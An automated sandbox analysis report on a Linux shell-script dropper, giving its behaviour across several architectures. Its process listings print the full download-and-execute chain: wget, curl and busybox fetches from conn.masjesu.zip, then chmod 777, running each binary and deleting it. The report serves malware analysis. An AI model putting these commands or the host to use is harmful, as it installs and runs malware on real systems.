Analysis Overview
SHA256
cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446
Threat Level: Shows suspicious behavior
The file cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
System Network Configuration Discovery
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-21 08:31
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-21 08:31
Reported
2024-11-21 08:33
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
148s
Max time network
129s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh
[/tmp/cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
Network
| Country | Destination | Domain | Proto |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 89.187.167.3:443 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-21 08:31
Reported
2024-11-21 08:33
Platform
debian9-armhf-20240729-en
Max time kernel
149s
Max time network
2s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Processes
/tmp/cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh
[/tmp/cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-21 08:31
Reported
2024-11-21 08:34
Platform
debian9-mipsbe-20240611-en
Max time kernel
115s
Max time network
118s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | N/A |
| N/A | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | N/A |
| N/A | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | N/A |
| N/A | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | N/A |
| N/A | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | N/A |
| N/A | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | N/A |
| N/A | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | N/A |
| N/A | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | N/A |
| N/A | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | N/A |
| N/A | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | N/A |
| N/A | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | N/A |
| N/A | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | N/A |
| N/A | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | N/A |
| N/A | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | N/A |
| N/A | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | N/A |
| N/A | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | N/A |
| N/A | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | N/A |
| N/A | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | N/A |
| N/A | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | N/A |
| N/A | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | N/A |
| N/A | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | N/A |
| N/A | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | N/A |
| N/A | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | N/A |
| N/A | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | N/A |
| N/A | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | N/A |
| N/A | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | N/A |
| N/A | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | N/A |
| N/A | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /usr/bin/curl | N/A |
Processes
/tmp/cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh
[/tmp/cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/chmod
[chmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
[./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/rm
[rm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/chmod
[chmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
[./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/rm
[rm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/chmod
[chmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
[./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/rm
[rm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/chmod
[chmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
[./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/rm
[rm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/chmod
[chmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb
[./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/rm
[rm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/chmod
[chmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe
[./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/rm
[rm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/chmod
[chmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
[./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/rm
[rm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/chmod
[chmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
[./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/rm
[rm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/chmod
[chmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
[./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/rm
[rm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/chmod
[chmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
[./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/rm
[rm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/chmod
[chmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
[./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/rm
[rm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/chmod
[chmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
[./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/rm
[rm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/chmod
[chmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
[./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/rm
[rm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/chmod
[chmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
[./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/rm
[rm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/chmod
[chmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
[./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/rm
[rm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/chmod
[chmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
[./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/rm
[rm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/chmod
[chmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
[./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/rm
[rm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/chmod
[chmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
[./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/rm
[rm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/chmod
[chmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
[./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/rm
[rm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/chmod
